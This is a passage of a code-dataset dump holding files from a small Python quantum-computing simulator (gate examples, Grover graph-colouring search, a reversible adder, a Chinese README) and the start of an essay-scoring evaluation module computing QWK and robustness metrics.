18.66666603088379, "blob_id": "c64dbe34d3bd8f4696bd2336d93012ea0fc9fec8", "content_id": "4c9dee15f27c8f7af8dcb91da2b87c33fe1f9215", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 118, "license_type": "no_license", "max_line_length": 67, "num_lines": 6, "path": "/nyasQuantumCalculate/RevCal/Builtin.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom .Operate import *\n\n\n__all__ = [\"M\", \"MA\", \"R\", \"RA\", \"I\", \"X\", \"CNOT\", \"CCNOT\", \"SWAP\"]\n" }, { "alpha_fraction": 0.4861690104007721, "alphanum_fraction": 0.48654794692993164, "avg_line_length": 31.987499237060547, "blob_id": "2a2921c83548d582c3198156ec67aa3e1bb92cd7", "content_id": "eb71f26f682c98db0a18f11653122fdb0e15c931", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3103, "license_type": "no_license", "max_line_length": 65, "num_lines": 80, "path": "/nyasQuantumCalculate/Operate/QubitsOperation.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom typing import Any, Callable, Type, TypeVar\n\nfrom nyasQuantumCalculate.System import *\n\n\n__all__ = [\"QubitsOperation\", \"OperationLike\"]\n\n\nOperationLike = TypeVar(\"OperationLike\",\n \"QubitsOperation\",\n Type[\"QubitsOperation\"],\n Callable[..., Any])\n\n\nclass QubitsOperation:\n \"\"\"QubitsOperation(str, bool)\n\n 用来标记量子位过程, 暂时没有什么用处.\n\n Attributes:\n name: 量子位过程的名字\n controllable: 过程是否可控\n trackable:\n 过程是否可跟踪, 当为True时, 跟踪过程\"应该\"覆盖掉底层操作, 当这个特性\n 需要暂时由用户自己提供, 参考`QubitsSystem.stopTracking`,\n `canTrack()`,`addTrack()`\n\n 推荐编写量子位过程的写法:\n class MyOperation(QubitsOperation):\n def __init__(self):\n super().__init__()\n self.name = \"自定义过程的名字\"\n # self.controllable = ...\n self.trackable = True # 用于化简跟踪信息\n\n def call(self, qbs: Qubits, qb: Qubit) -> None:\n # 这个方法记述量子过程的运算\n # 一般量子过程都是不返回值的\n ...\n\n def __call__(self, qbs: Qubits, qb: Qubit) -> None:\n # 这个方法用于控制过程的跟踪和判断错误等\n if Options.inputCheck:\n if not inSameSystem(qbs, qb):\n # 判断输入量子位是否在同一个系统内\n raise ValueError(...)\n if any(isControllingQubits(qbs, qb)):\n # 判断输入量子位是否存在控制位\n raise ValueError(...)\n if haveSameQubit(qbs, qb):\n # 判断是否有重复的量子位\n raise ValueError(...)\n qbsys = qbs.system # 从输入参数里获得量子位系统\n sysStopTrack = qbsys.stopTracking # 用于在退出方法时还原\n if qbsys.canTrack() and self.trackable:\n qbsys.addTrack(...) # 添加跟踪条目\n qbsys.stopTracking = True # 停止跟踪\n self.call(qbs, qb) # 作用过程\n if not sysStopTrack:\n # 还原系统原本的状态\n qbsys.stopTracking = False\n \"\"\"\n def __init__(self, name: str = \"\",\n controllable: bool = False,\n trackable: bool = False,\n **kwargs: Any) -> None:\n self.name = name\n self.controllable = controllable\n self.trackable = trackable\n\n @staticmethod\n def getOperation(opr: OperationLike) -> Callable[[Any], Any]:\n return opr() if isinstance(opr, type) else opr\n\n #def call(self, ...) -> ...: ...\n\n def __call__(self, *args: Any, **kwargs: Any) -> Any:\n raise NotImplementedError\n" }, { "alpha_fraction": 0.7168141603469849, "alphanum_fraction": 0.721238911151886, "avg_line_length": 21.600000381469727, "blob_id": "b537525c10fbc3895600b9a80315e184c42e7add", "content_id": "d499b00d54f25d4240d8558f872f93a611a4874d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 226, "license_type": "no_license", "max_line_length": 30, "num_lines": 10, "path": "/nyasQuantumCalculate/Operate/__init__.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom .QFT import *\nfrom .Swap import *\nfrom .ControlMethod import *\nfrom .ApplyMethod import *\nfrom .Reset import *\nfrom .Measure import *\nfrom .SingleQubitGate import *\nfrom .QubitsOperation import *\n" }, { "alpha_fraction": 0.5734907984733582, "alphanum_fraction": 0.5944882035255432, "avg_line_length": 18.049999237060547, "blob_id": "3e72f35fb116abcadb357541193dbcfdb4665dff", "content_id": "30d324a3aa4a814d9da96fc35c0d2972679ed581", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 762, "license_type": "no_license", "max_line_length": 50, "num_lines": 40, "path": "/examples/others/Adder.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n\nUSE_QUANTUM = False\nn = 3\n\n\nif USE_QUANTUM:\n from nyasQuantumCalculate import *\n Bit = Qubit\n Bits = Qubits\n BitsSystem = QubitsSystem\nelse:\n from nyasQuantumCalculate.RevCal import *\n\nfrom nyasQuantumCalculate.Utils import Bools2Int\nfrom typing import Any\nX: Any = Builtin.X\n\n\nbsys = BitsSystem(2 * (n + 1))\nCin = bsys[0]\nA = bsys[1:n+1]\nB = bsys[n+1:2*n+1]\nCout = bsys[2*n+1]\n\n\nfor a in range(2 ** n):\n for b in range(2 ** n):\n X(Cin)\n ApplyFromInt(X, a, A)\n ApplyFromInt(X, b, B)\n\n # nyasQuantumCalculate.HighLevel.Add.Adder\n Adder(Cin, A, B, Cout)\n\n result = [Builtin.M(Cout)] + Builtin.MA(B)\n Builtin.RA(bsys[:])\n\n print(f\"{a} + {b} = {Bools2Int(result)}\")\n" }, { "alpha_fraction": 0.6383363604545593, "alphanum_fraction": 0.6401446461677551, "avg_line_length": 28.105262756347656, "blob_id": "dbb0c22a52a10fba5dee7c816025fb94c7a119c2", "content_id": "2df9117f435e9c10f577f03da195759c106ac2b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1106, "license_type": "no_license", "max_line_length": 72, "num_lines": 38, "path": "/nyasQuantumCalculate/__init__.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom .HighLevel import *\nfrom .Operate import *\nfrom .System import *\nfrom .Options import *\n\nfrom . import Builtin\nfrom . import Utils\n\n__all__ = [\n \"Builtin\", \"Utils\",\n # .HighLevel.Add\n \"Adder\", \"PhaseAdd\", \"IPhaseAdd\", \"Add\", \"IAdd\",\n \"PhaseAddInt\", \"IPhaseAddInt\", \"AddInt\", \"IAddInt\",\n # .HighLevel.Modular\n #\"PhaseModularAddInt\", \"ModularAddInt\",\n # .Operate.ApplyMethod\n \"ApplyToEach\", \"ApplyFromBools\", \"ApplyFromInt\",\n # .Operate.ControlMethod\n \"Controlled\", \"ControlledOnInt\", \"Toffoli\",\n # .Operate.QubitsOperation\n \"QubitsOperation\", \"OperationLike\",\n # .Operate.SingleQubitGate\n \"SingleQubitGate\", \"Rx\", \"Ry\", \"Rz\", \"R1\", \"Phase\", \"RotationGates\",\n # .System.__init__\n \"inSameSystem\", \"isControllingQubits\", \"haveSameQubit\",\n # .System.Dump\n \"DumpSystemText\", \"DumpSystemFig\", \"have_matplotlib\",\n # .System.Qubit\n \"Qubit\", \"TemporaryQubit\",\n # .System.Qubits\n \"Qubits\", \"TemporaryQubits\",\n # .System.QubitsSystem\n \"QubitsSystem\",\n # .Options\n \"Options\", \"TemporaryOptions\", \"TempOption\"\n]\n" }, { "alpha_fraction": 0.6122406125068665, "alphanum_fraction": 0.6336197853088379, "avg_line_length": 26.900585174560547, "blob_id": "afb0cc63db62aede4513d120b1c93c27274bab84", "content_id": "ca4508f9b57b7c5df5c1d4a026cfb8b41613506b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6620, "license_type": "no_license", "max_line_length": 79, "num_lines": 171, "path": "/examples/4-GroverAlgorithm.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\nfrom typing import Callable\n\nfrom numpy import pi, sqrt, arcsin\n\nfrom nyasQuantumCalculate import *\nfrom nyasQuantumCalculate.Utils import Bools2Int\n\n\n# 把自动normalize设为False以加快运行速度\nOptions.autoNormalize = False\n\n\n############################# 搜索问题 #######################################\n\"\"\"\n有一个黑盒 f: Z -> {0,1}, 寻找一个输入x使得f输出为1\n\n这个问题被称为搜索问题. 图形着色问题, 数据库搜索也属于搜索问题.\n\"\"\"\n\n\n############################ 图形着色问题 ####################################\nr\"\"\"下面以一个实际的问题作为 Grover 算法的例子\nhttps://en.wikipedia.org/wiki/Graph_coloring\n\n构建一个无向图:\n 0------1\n |\\ /|\n | \\ / |\n | \\/ |\n | /\\ |\n | / \\ |\n |/ \\|\n 2------3------4\n寻找一种着色方案使得每条边上不存在相同的颜色.\n\n在这个例子中, 需要的最少颜色为4种, 使用2bits对一个顶点的颜色进行编码.\n总共5个顶点, 则需要10bits储存结果.\n\"\"\"\n\n# 使用索引表示线段与点的关系\nedges = [(0, 1), (0, 2), (0, 3), (1, 2), (1, 3), (2, 3), (3, 4)]\n# 表示颜色需要的bit数\nnColorBits = 2\n# 总共顶点数\nnVertex = max(max(edge) for edge in edges) + 1\n\n\ndef ColorEquality(c0: Qubits, c1: Qubits, target: Qubit):\n \"\"\"计算输入的两种颜色是否相同, 如果相同则翻转target的状态, 否则什么也不做\"\"\"\n # 把c0和c1按位做异或, 并把结果储存在c1\n for q0, q1 in zip(c0, c1):\n Builtin.CNOT(q0, q1)\n # 如果c1全部为0, 则c0与c1相同, 此时翻转target的状态\n ApplyToEach(Builtin.X, c1)\n Controlled(Builtin.X, c1, target)\n\n # 因为作为数据位的c1被修改了, 在退出前需要还原c1的数据\n ApplyToEach(Builtin.X, c1)\n for q0, q1 in zip(c0, c1):\n Builtin.CNOT(q0, q1)\n\n\ndef ValidVertexColoring(register: Qubits, target: Qubit):\n \"\"\"计算按照edges的图形, colors的着色是否为解, 如果是则翻转target, 否则什么也不做\"\"\"\n # 输入的colors的量子位数量应该为 颜色的bit数*总定点数, 在这里为10\n assert len(register) == nColorBits * nVertex\n\n # 把寄存器分离为顶点\n colors = [register[nColorBits*v: nColorBits*(v+1)] for v in range(nVertex)]\n\n # 使用寄存器记录每条边的顶点颜色是否一样\n with TemporaryQubits(register.system, len(edges)) as edgesResult:\n # 对每一条边计算两顶点的颜色是否一样, 并把结果储存在edgesResult里\n for (idx0, idx1), edgeResult in zip(edges, edgesResult):\n ColorEquality(colors[idx0], colors[idx1], edgeResult)\n # 如果edgesResult的结果全部为|0❭, 则证明全部边上不存在相同的颜色,\n # 这时候colors的着色为解, 则翻转target\n ApplyToEach(Builtin.X, edgesResult)\n Controlled(Builtin.X, edgesResult, target)\n\n # 尽管在退出with时会自动重置edgesResult,\n # 但是手动还原为原本的状态是良好的习惯\n ApplyToEach(Builtin.X, edgesResult)\n for (idx0, idx1), edgeResult in zip(edges, edgesResult):\n ColorEquality(colors[idx0], colors[idx1], edgeResult)\n\n\n\"\"\"Grover算法需要不断迭代Grover过程才可以得到需要的答案,\n\nGrover过程包含以下两步:\n 1) 把标记状态的相位反转\n 2) 作用Grover扩散算子(Grover diffusion operator)\n\nGrover扩散算子可以减少大于平均值的状态而增加少于平均值的状态,\n当需要的结果数量小于不需要的结果数量时, Grover扩散算子可以有效地增加需要的结果的机率.\n\n记M为全部需要结果的数量, N为全部结果的数量 (在这里M=72, N=2^10=1024)\n则迭代次数 j = round(π / (4 * arcsin(sqrt(M / N))) - .5); (在这里为2)\n\"\"\"\n\n\ndef GroverSearch(f: Callable[[Qubits, Qubit], None],\n register: Qubits, nIter: int):\n \"\"\"Grover算法是通用算法, 给出黑盒f和|0❭状态register, 并执行nIter次Grover过程\"\"\"\n # 使寄存器处于全部结果的叠加态里\n ApplyToEach(Builtin.H, register)\n # 使用\"相位反冲\"技巧翻转目标状态\n with TemporaryQubit(register.system) as target:\n Builtin.X(target)\n Builtin.H(target)\n\n # 执行Grover过程\n for _ in range(nIter):\n # 把标记状态的相位反转\n f(register, target)\n # 作用Grover扩散算子\n ApplyToEach(Builtin.H, register)\n ApplyToEach(Builtin.X, register)\n Controlled(Builtin.Z, register[0:-1], register[-1])\n ApplyToEach(Builtin.X, register)\n ApplyToEach(Builtin.H, register)\n # Grover扩散算子应该在执行完上述步骤后, 把全部状态的相位翻转\n # 但由于全局相位对计算和测量都没有影响, 所以最后一步并不是必须的\n Phase(pi)(register[-1]) # Grover扩散算子最后一步\n\n # 退出前还原临时量子位\n Builtin.H(target)\n Builtin.X(target)\n\n\n\"\"\"运行例子\n需要注意的是, Grover算法是以很大概率给出正确答案, 所以检查答案是否正确也是必须的\"\"\"\n\n\n# 计算迭代Grover过程的数量\nm = 72 # 正确答案的数量\nn = 2 ** (nColorBits * nVertex) # 所有答案的数量\nj = round(pi / (4 * arcsin(sqrt(m / n))) - .5)\n\n# 初始化量子位系统\nqbsys = QubitsSystem(nColorBits * nVertex)\nregister = qbsys.getQubits()\n\n# 这个result是不让编辑器提示result(169)不存在的, 并没有实际用途\nresult = Builtin.MA(register)\n\n# 使用一个额外的量子位判断答案是否正确, 如果不正确则继续运行Grover算法\nwith TemporaryQubit(qbsys) as Correctness:\n while Builtin.M(Correctness) == 0:\n # 运行Grover算法\n GroverSearch(ValidVertexColoring, register, j)\n\n # 测量寄存器, 并使量子位全部坍缩到测量结果里\n result = Builtin.MA(register)\n # 判断结果是否正确, 如果正确则把Correctness从|0❭变为|1❭\n ValidVertexColoring(register, Correctness)\n # 无论结果是否正确都需要重置寄存器\n Builtin.RA(register)\n # 因为while退出时Correctness必定处于|1❭, 则应用X门等于重置Correctness\n Builtin.X(Correctness)\n\n\n# 使用比较好的方式输出结果\nfor v in range(nVertex):\n print(f\"Vertex {v} has color \"\n f\"{Bools2Int(result[nColorBits*v : nColorBits*(v+1)])}\")\n" }, { "alpha_fraction": 0.6430020332336426, "alphanum_fraction": 0.6609195470809937, "avg_line_length": 23.649999618530273, "blob_id": "61744848eb8fbc9c00d8bbbb0e96cf0bf64845b2", "content_id": "e2ba624ddab3931b8d2e66815591d4ac8967e7fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4742, "license_type": "no_license", "max_line_length": 174, "num_lines": 120, "path": "/README.md", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# nyasQuantumCalculate\n一个简单的量子计算模拟库\n```python\nfrom nyasQuantumCalculate import *\n\nqbsys = QubitsSystem(1)\nqubit = qbsys[0]\nBuiltin.H(qubit)\nresult = Builtin.M(qubit)\nprint(result) # 0 or 1\n```\n\n---\n\n## 安装\n\n1. 下载这个仓库\n2. 运行`python setup.py install`\n3. 试着运行`examples/`里的例子\n\n---\n\n## 使用\n\n1. 量子位系统\n\n * 使用 `QubitsSystem(int)` 初始化量子位系统\n\n2. 量子位\n\n * 常用的量子位类型有 `Qubit` 和 `Qubits`\n * 可以通过 `qbsys.getQubit(int)` int和 `qbsys.getQubit(int, ...)` 获得量子位, 其中`qbsys`是`QubitsSystem`实例\n * 当然也可以通过 `qbsys` 的索引方法获得\n\n3. 量子位门\n\n * `Builtin`里有常用的量子位门 `I`, `H`, `X`, `Y`, `Z`, `S`, `T`, `SR`, `TR`, `CNOT`, `CCNOT`\n * 使用 `Rx(float)`, `Ry(float)`, `Rz(float)`, `R1(float)`, `Phase(float)` 可以获取旋转门和相位门\n * 量子位门通过 `__call__` 方法作用在量子位上, 如: `X(qb)`\n * 或使用方法 `ApplyToAll` 把单量子位们作用在 `Qubits` 里每个量子位上\n * 提供了 `Controlled` 方法, 实现可控过程\n * `QFT` 和 `IQFT` 如同位门一样直接作用在多量子位上\n\n3. 测量系统\n\n * 可以使用方法 `Builtin.M` 测量`Qubit`, 并返回测量结果 (`False` 或 `True`)\n * 或使用方法 `Builtin.MA` 测量`Qubits`, 并返回包含测量结果的列表\n\n4. 重置系统\n\n * 使用方法 `Builtin.R` 重置`Qubit`, 方法 `Builtin.RA` 重置`Qubits`\n * 可以直接使用语句 `Builtin.RA(qbsys.getQubits())` 重置整个系统\n * 退出程序或释放`QubitsSystem`实例前重置整个系统是好习惯\n\n---\n\n## FAQ\n\n* 这个库有前置库吗\n\n 需要 `numpy` 来执行底层运算. 推荐安装 `matplotlib` 来使用比较美观的量子系统可视化方法 `DumpMachineFig`\n\n* 为什么不把库放到`pypi`上呢\n\n 目前这个库还只是半成品. 并且pypi上可以安装qsharp等更好的库, ~~不想继续增加pip里面的垃圾了~~.\n\n* 内置的方法好少, 使用好困难\n\n 目前这个库还是测试版本, 日后会增加更多功能\n\n* 为什么执行`QFT`和`IQFT`的时候使用内存翻了一倍\n\n 使用`numpy`算法的`QFT`底部逻辑是重新构建一个系统状态`statesNd`, 请确保没有在其他地方引用`qbsys.stateNd`. 如果实在需要引用`statesNd`, 可以通过 `Options.QFTwithNumpy = False` 把`QFT`逻辑切换为位门实现, 在很多量子位(如20个以上)速度会受到严重影响.\n\n* 我可以跟别人分享这个库吗, 有什么限制吗\n\n 莫得限制, 随便来就好, 最好可以标注一下作者啦\n\n---\n\n### 0.1.1\n\n减少了部分逻辑, 使某些功能更通用. 例如支持多重控制, 删除临时量子位前必须由用户重置而不是自动重置\n\n增加了内部库 `Builtin`, 内置的位门,测量,重置等操作都以`常量`收录在里面, 而不是直接暴露在表层\n\n增加了 `AQFT` 和 `IAQFT` 在`Builtin`里. See more: `help(Builtin.AQFT)`\n\n重构了库之间的引用顺序, `Reset`, `Measure`, `ResetAll`, `MeasureAll` 已被 `Builtin.R`, `Builtin.RA`, `Builtin.M`, `Builtin.MA` 替代\n\n新增内部库 `RevCal`, 模拟电子计算机的可逆计算. 大部分方法与量子计算相同, 内置`X`(可逆NOT门), `CNOT`(可逆XOR门), `CCNOT`(可逆AND门). 使用: 输入使用`ApplyFromInt(X, int, Bits)`, 输出使用 `Builtin.MA(Bits)`.\n\n**不要同时引用 `nyasQuantumCalculate` 和 `nyasQuantumCalculate.RevCal`**\n\n### 0.1.2\n\n取消 **选项**`reverseBitIndex`, 增加 **选项**`littleEndian`. 现在 `ApplyFromInt`, `ControlledOnOnt`, `Bools2Int`, `Int2Bools` 和 `Dump` 方法都受 `littleEndian` 影响.\n\n修复 `Qubit + Qubits` 的顺序错误\n\n现在 `SWAP` 和 `~QFT` 方法是受控过程, 并修复`Options.QFTwithNumpy`为`False`时`IQFT`的逻辑错误\n\n增加 **选项**`inputCheck`, 用于检查输入过程参数的正确性, 比如多个量子位应该在同一个系统内, 过程作用的量子位不应该为控制位, 不应该重复输入相同的量子位, 等.\n\n增加`|1❭`相位旋转门的管理器 `RotationGates`. See more: `help(RotationGates)`\n\n增加高级操作 `加法`: `Add`, `AddInt`, 以及他们的逆操作`I~`, 相位版本`Phase~`和逆相位版本`IPhase~`. 增加n-bit加法电路 `Adder`.\n\n---\n\n### 联系方式\n\nqq群 ~~瑟图群~~ : 274767696\n\n作者: **nyasyamorina** *[qq: 1275935966]* (加好友时请备注来意, 免得当作机器人了)\n\n\n特别感谢 **_hyl** 提供 `pyi` 文件的翻译, _hyl: `\"如果发现翻译有错的话, 可以去找我商讨\"` *[qq: 2738846947]*\n\n还有非常感激广大群友提供技术支持\n" }, { "alpha_fraction": 0.6055616736412048, "alphanum_fraction": 0.646908164024353, "avg_line_length": 24.073394775390625, "blob_id": "c68d8fdafad0471df4ccbaba822a2f5524f9a59e", "content_id": "156b78df5ec84b814d79114c4b4cfe5f9fe571e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2893, "license_type": "no_license", "max_line_length": 66, "num_lines": 109, "path": "/examples/0-SingleQubitGate.py", "repo_name": "wxdlywy/nyasQuantumCalculate", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.dirname(__file__)))\n\nfrom nyasQuantumCalculate import *\n\n\nsytm = QubitsSystem(1)\nqubit: Qubit = sytm[0]\n\n\nprint(\"Original qubit:\")\nDumpSystemText(qubit.system) # ∣0❭: 1, ∣1❭: 0\n\n\n# Identity Gate\n# I gate doing somthing looks like do nothing\nprint(\"after Identity gate:\")\nBuiltin.I(qubit)\nDumpSystemText(qubit.system) # ∣0❭: 1, ∣1❭: 0\n# Reset\n\n\n# Pauli Gates\n# X gate can reverse states ∣0❭ and ∣1❭\nprint(\"after pauli-X gate:\")\nBuiltin.X(qubit)\nDumpSystemText(qubit.system) # ∣0❭: 0, ∣1❭: 1\nBuiltin.X(qubit) # Reset\n\n# Y gate do similar thing as X gate, but on image number\nprint(\"after pauli-Y gate:\")\nBuiltin.Y(qubit)\nDumpSystemText(qubit.system) # ∣0❭: 0, ∣1❭: i\nBuiltin.Y(qubit) # Reset\n\n# Z gate will flip the phase of ∣1❭, but do nothing on ∣0❭\nprint(\"after pauli-X gate and pauli-Z gate:\")\nBuiltin.X(qubit) # ∣0❭: 0, ∣1❭: 1\nBuiltin.Z(qubit)\nDumpSystemText(qubit.system) # ∣0❭: 0, ∣1❭: -1\nBuiltin.Z(qubit)\nBuiltin.X(qubit) # Reset\n\n\n# Hadamard Gate\n# H gate will make qubit between ∣0❭ and ∣1❭\nprint(\"after Hadamard gate:\")\nBuiltin.H(qubit)\nDumpSystemText(qubit.system) # ∣0❭: .707, ∣1❭: .707\nBuiltin.H(qubit) # Reset\n\n\n# Pahse Shift Gates\n# T gate and S gate will shift phase of ∣1❭, but do nothing on ∣0❭\nprint(\"after pauli-X gate and T gate:\")\nBuiltin.X(qubit) # ∣0❭: 0, ∣1❭: 1\nBuiltin.T(qubit)\nDumpSystemText(qubit.system) # ∣0❭: 0, ∣1❭: .707+.707i\nBuiltin.TR(qubit)\nBuiltin.X(qubit) # Reset\n\nprint(\"after pauli-X gate and S gate:\")\nBuiltin.X(qubit) # ∣0❭: 0, ∣1❭: 1\nBuiltin.S(qubit)\nDumpSystemText(qubit.system) # ∣0❭: 0, ∣1❭: i\nBuiltin.SR(qubit)\nBuiltin.X(qubit) # Reset\n\n\n# Rotation Gates\n# rotation gates will \"rotate\" the qubit on \"Bloch sphere\"\n# https://en.wikipedia.org/wiki/Bloch_sphere\nangle = 1.0471975511966 # pi / 3\n\nprint(\"after Rotation-X gate:\")\nRx(angle)(qubit)\nDumpSystemText(qubit.system) # ∣0❭: .866, ∣1❭: -.5i\nRx(-angle)(qubit) # Reset\n\nprint(\"after Rotation-Y gate:\")\nRy(angle)(qubit)\nDumpSystemText(qubit.system) # ∣0❭: .866, ∣1❭: .5\nRy(-angle)(qubit) # Reset\n\nprint(\"after Rotation-Z gate:\")\nRz(angle)(qubit)\nDumpSystemText(qubit.system) # ∣0❭: .866-.5i, ∣1❭: 0\nRz(-angle)(qubit) # Reset\n\nprint(\"after pauli-X gate and Rotation-1 gate:\")\nBuiltin.X(qubit)\nR1(angle)(qubit)\nDumpSystemText(qubit.system) # ∣0❭: 0, ∣1❭: .5+.866i\nR1(-angle)(qubit)\nBuiltin.X(qubit) # Reset\n\n\n# Phase Gate\n# phase gate will shift global phase\nprint(\"after Phase gate:\")\nPhase(angle)(qubit)\nDumpSystemText(qubit.system) # ∣0❭: .5+.866i, ∣1❭: 0\nPhase(-angle)(qubit) # Reset\n\n\n# Exit\nBuiltin.RA(sytm.getQubits())\n" } ]
39
sunnypwang/aes
https://github.com/sunnypwang/aes
6cb1dd30aee719fe425c092521ca073e7b224aac
ca05e15a6e78e805197545eef541ebb7292f90fb
ddd2c777b489d083fa6852c5e028bdc1194b2ad8
refs/heads/master
2022-12-24T10:59:29.234947
2020-10-02T07:10:31
2020-10-02T07:10:31
266,822,244
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.5299122333526611, "alphanum_fraction": 0.5432815551757812, "avg_line_length": 37.36787414550781, "blob_id": "4d2f6a12b1c206b5f1020638a1d07c8dc7011465", "content_id": "f38f85a3d5763002f8ce99849f6053150b4edd7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7405, "license_type": "no_license", "max_line_length": 145, "num_lines": 193, "path": "/eval_utils.py", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "import numpy as np\nimport pandas as pd\nimport os\nfrom keras.callbacks import *\nfrom sklearn.metrics import cohen_kappa_score\nimport utils\nfrom data_utils import gen, prepare_features, rescale_to_int\n\n\nclass EvaluateCallback(Callback):\n def __init__(self, prompt, val_data, model_name, vocab=None, batch_size=5):\n self.prompt = prompt\n self.val_data = val_data\n self.model_name = model_name\n self.vocab = vocab\n self.batch_size = batch_size\n self.steps = np.ceil(len(val_data) / batch_size)\n self.y_true = prepare_features(model_name,\n df=val_data, prompt=prompt, y_only=True)\n\n def on_epoch_end(self, epoch, logs):\n y_pred = self.model.predict_generator(\n gen(self.model_name, self.prompt, self.val_data, self.vocab, self.batch_size, test=True, shuffle=False), steps=self.steps, verbose=1)\n\n generate_qwk(self.prompt, self.model_name,\n self.y_true, y_pred, epoch+1, 'val')\n\n\ndef generate_qwk(prompt, model_name, y_true, y_pred, epoch, suffix=''):\n path = utils.mkpath('pred/{}'.format(model_name))\n\n y_true = rescale_to_int(y_true, prompt)\n y_pred = rescale_to_int(y_pred, prompt)\n qwk = QWK(y_true, y_pred)\n\n with open(os.path.join(path, 'qwk_{}_{}.csv'.format(prompt, suffix)), 'a+') as f:\n f.write('{}, {}\\n'.format(epoch, qwk))\n\n\ndef generate_score(prompt, model_name, epoch, y_true, y_pred, aug_pred, test_df):\n path = utils.mkpath('pred/{}'.format(model_name))\n\n df = pd.DataFrame()\n df['essay_id'] = test_df['essay_id']\n df['essay_set'] = test_df['essay_set']\n df['domain1_score'] = y_true\n df['test'] = y_pred\n for key in aug_pred:\n df['test_' + key] = aug_pred[key]\n df.to_csv(os.path.join(path, 'score_{}_{}.tsv'.format(prompt, epoch)),\n sep='\\t', index=False)\n return df\n\n\ndef generate_robustness(prompt, model_name, epoch, y_true, y_pred, aug_pred):\n path = utils.mkpath('pred/{}'.format(model_name))\n\n # y_true = rescale_to_int(y_true, prompt)\n y_pred_int = rescale_to_int(y_pred, prompt)\n aug_pred_int = {}\n wr_t, br_t, w_t, b_t = 0, 0, 0, 0\n N = len(y_pred) * len(aug_pred)\n print('N :', N)\n\n with open(os.path.join(path, 'robustness_{}_{}.csv'.format(prompt, epoch)), 'w+') as f:\n f.write('augment,worse_raw,better_raw,worse_resolved,better_resolved\\n')\n for key in aug_pred:\n aug_pred_int[key] = rescale_to_int(aug_pred[key], prompt)\n\n wr, br, w, b = robustness(\n y_pred, aug_pred[key], y_pred_int, aug_pred_int[key])\n wr_t += wr\n br_t += br\n w_t += w\n b_t += b\n f.write('{},{},{},{},{}\\n'.format(key, wr, br, w, b))\n f.write('sum,{},{},{},{}\\n'.format(wr_t, br_t, w_t, b_t))\n f.write('avg,{},{},{},{}\\n'.format(wr_t/N, br_t/N, w_t/N, b_t/N))\n\n\ndef generate_summary(model_name, epoch):\n prompts = [1, 2, 3, 4, 5, 6, 7, 8]\n # number of essay in test set\n length = [-1, 179, 180, 173, 177, 181, 180, 157, 73]\n path = utils.mkpath('pred/{}'.format(model_name))\n\n with open(os.path.join(path, 'summary_{}.txt'.format(epoch)), 'w+') as f:\n f.write('{} epoch {}\\n\\n'.format(model_name, epoch))\n f.write('QWK\\n')\n qwk_avg = 0\n for p in prompts:\n qwk_df = pd.read_csv(os.path.join(path, 'qwk_{}_test.csv'.format(\n p)), header=None, names=['epoch', 'qwk'])\n qwk = qwk_df[qwk_df['epoch'] == epoch].values[-1, -1]\n f.write('{}\\t{}\\n'.format(p, qwk))\n qwk_avg += qwk\n\n f.write('\\nRobustness per prompt\\n')\n r_avg = 0\n r_aug_avg = 0\n for p in prompts:\n robustness_df = pd.read_csv(os.path.join(\n path, 'robustness_{}_{}.csv'.format(p, epoch)))\n r = (robustness_df['worse_resolved'] -\n robustness_df['better_resolved']).values[-1]\n f.write('{}\\t{}\\n'.format(p, r))\n r_avg += r\n\n r_aug = (robustness_df['worse_resolved'] -\n robustness_df['better_resolved']).values[:-2]/length[p]\n r_aug_avg += r_aug\n\n f.write('\\nRobustness per augment\\n')\n r_aug_avg /= 8\n for a, r in zip(robustness_df['augment'][:-2], r_aug_avg):\n f.write('{}\\t{}\\n'.format(a, r))\n\n f.write('\\n')\n f.write('QWK Average:\\t{}\\n'.format(qwk_avg / 8))\n f.write('Robustness Average:\\t{}\\n'.format(r_avg / 8))\n f.write('Robustness Average:\\t{}\\n'.format(r_aug_avg.mean()))\n print('summary generated!')\n\n\ndef generate_summary_best(model_name):\n prompts = [1, 2, 3, 4, 5, 6, 7, 8]\n # number of essay in test set\n length = [-1, 179, 180, 173, 177, 181, 180, 157, 73]\n path = utils.mkpath('pred/{}'.format(model_name))\n\n best_ep = [-1]*9\n with open(os.path.join(path, 'summary_best.txt'), 'w+') as f:\n f.write('{}\\n\\n'.format(model_name))\n f.write('QWK\\n')\n f.write('epoch\\tprompt\\tqwk\\n')\n qwk_avg = 0\n for p in prompts:\n qwk_df = pd.read_csv(os.path.join(path, 'qwk_{}_val.csv'.format(\n p)), header=None, names=['epoch', 'qwk'])\n max_idx = qwk_df['qwk'].idxmax()\n best_ep[p] = int(qwk_df.iloc[max_idx].values[0])\n\n qwk_df = pd.read_csv(os.path.join(path, 'qwk_{}_test.csv'.format(\n p)), header=None, names=['epoch', 'qwk'])\n\n try:\n tmp = qwk_df[qwk_df['epoch'] == best_ep[p]].values\n 